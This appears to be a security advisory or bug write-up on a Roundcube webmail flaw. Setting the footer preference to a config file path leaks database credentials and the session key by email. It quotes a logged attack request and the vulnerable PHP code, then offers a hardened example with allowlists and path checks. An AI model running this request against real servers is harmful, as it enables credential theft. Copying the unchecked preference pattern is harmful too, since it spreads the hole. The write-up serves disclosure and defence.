The attacker first changes the value of the user preference generic_message_footer to any file Roundcube is allowed to read (config/db.inc.php, config/main.inc.php), then sends herself a message, which arrives with the config file included as the footer. This reveals the session crypto key and the DB user and password. If phpMyAdmin (MySQL) or phpPgAdmin (PostgreSQL) is installed on the host and sessions are stored in the DB, the attacker obtains users' mail logins and passwords.
Found on a Russian tech blog (http://habrahabr.ru/post/174423/).
Request from the access log that changes the preference:
POST /?_task=settings&_action=save-pref&check_request=&_check_request= HTTP/1.1" 200 1133 "http://mail.ddos-guard.net/?_task=mail" "Mozilla/5.0 (Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0" "_token=0f7c9ae8a387cb0bc5ce563fa09fe172&_session=generic_message_footer&_name=generic_message_footer&_value=config/db.inc.php
index.php:
else if ($RCMAIL->action == 'save-pref') { include INSTALL_PATH . 'program/steps/utils/save_pref.inc'; }
program/steps/utils/save_pref.inc:
    $name  = get_input_value('_name', RCUBE_INPUT_POST);
    $value = get_input_value('_value', RCUBE_INPUT_POST);

    // save preference value
    $RCMAIL->user->save_prefs(array($name => $value));
    // <--------- any preference name/value from the request is written here, no allowlist

    // update also session if requested
    if ($sessname = get_input_value('_session', RCUBE_INPUT_POST)) {
        // Support multidimensional arrays...
        $vars = explode('/', $sessname);
        // ... up to 3 levels
        if (count($vars) == 1)
            $_SESSION[$vars[0]] = $value;
        else if (count($vars) == 2)
            $_SESSION[$vars[0]][$vars[1]] = $value;
        else if (count($vars) == 3)
            $_SESSION[$vars[0]][$vars[1]][$vars[2]] = $value;
    }

    $OUTPUT->reset();
    $OUTPUT->send();
program/steps/mail/sendmail.inc:
    // generic footer for all messages
    if ($isHtml && !empty($CONFIG['generic_message_footer_html'])) {
        $footer = file_get_contents(realpath($CONFIG['generic_message_footer_html']));
        // <----- reads the file at the path taken from the user-controlled preference
        $footer = rcube_charset_convert($footer, RCMAIL_CHARSET, $message_charset);
    }
    else if (!empty($CONFIG['generic_message_footer'])) {
        $footer = file_get_contents(realpath($CONFIG['generic_message_footer']));
        // <----- reads the file at the path taken from the user-controlled preference
        $footer = rcube_charset_convert($footer, RCMAIL_CHARSET, $message_charset);
        if ($isHtml)
            $footer = '<pre>'.$footer.'</pre>';
    }
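The two weak spots above (save_pref.inc accepting any preference name, and sendmail.inc reading whatever path the resulting $CONFIG value points at) can be closed together. The following is an added example of a hardened shape, written for this page and not Roundcube's own code or its actual fix; $ALLOWED_PREFS, $ALLOWED_SESSION_KEYS, $FOOTER_DIR and the three function names are assumptions made for the illustration.

```php
<?php
// Added example, not Roundcube's code. All names below are assumptions.

// Preference names the client may set through save-pref. Anything else,
// generic_message_footer included, is refused and logged.
$ALLOWED_PREFS = array('preview_pane', 'list_cols', 'collapsed_folders');
// Slash-separated session key paths (up to 3 levels) the client may update.
$ALLOWED_SESSION_KEYS = array('list_attrib/columns');
// Footer files may only be read from below this directory.
$FOOTER_DIR = '/var/lib/roundcube/footers';

// Returns the array to hand to save_prefs(), or null when the name is not
// on the allowlist. Rejections go to error_log so an operator can alert on them.
function filter_pref_update($name, $value, array $allowed)
{
    if (!in_array($name, $allowed, true)) {
        error_log("save-pref: rejected preference name '$name'");
        return null;
    }
    return array($name => $value);
}

// Writes the session value only for an allowlisted key path; keeps the
// original 1-3 level behaviour. Returns true when the write happened.
function apply_session_update($sessname, $value, array $allowed, array &$session)
{
    if (!in_array($sessname, $allowed, true)) {
        error_log("save-pref: rejected session key '$sessname'");
        return false;
    }
    $vars = explode('/', $sessname);
    switch (count($vars)) {
        case 1: $session[$vars[0]] = $value; break;
        case 2: $session[$vars[0]][$vars[1]] = $value; break;
        case 3: $session[$vars[0]][$vars[1]][$vars[2]] = $value; break;
        default: return false;
    }
    return true;
}

// Reads a footer file only if its resolved path lies inside $footerDir.
// realpath() collapses "../" and symlinks, so a relative or absolute path to
// config/db.inc.php resolves outside the directory and is refused.
function read_footer_file($configured, $footerDir)
{
    $base = realpath($footerDir);
    $real = realpath($configured);
    if ($base === false || $real === false) {
        return '';
    }
    if (strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        error_log("footer: refused to read '$configured' (outside $footerDir)");
        return '';
    }
    $footer = file_get_contents($real);
    return $footer === false ? '' : $footer;
}

// Demonstration with the values carried by the logged request above.
$name  = 'generic_message_footer';   // from _name=
$value = 'config/db.inc.php';         // from _value=

$prefs = filter_pref_update($name, $value, $ALLOWED_PREFS);
var_dump($prefs);                     // NULL: nothing is written

$session = array();
var_dump(apply_session_update($name, $value, $ALLOWED_SESSION_KEYS, $session)); // bool(false)

// Even if the preference had slipped through, the footer loader will not
// serve a file outside $FOOTER_DIR.
var_dump(read_footer_file($value, $FOOTER_DIR) === '');                          // bool(true)
```

In the real handler the call would become `if ($prefs !== null) $RCMAIL->user->save_prefs($prefs);`, and sendmail.inc would call read_footer_file() in place of the bare file_get_contents(realpath(...)). The rejected names land in the web server's error log, which gives the operator a concrete signal to watch for; the POST body in the access-log line above (`_name=generic_message_footer&_value=config/...`) is the same signal seen from the request side.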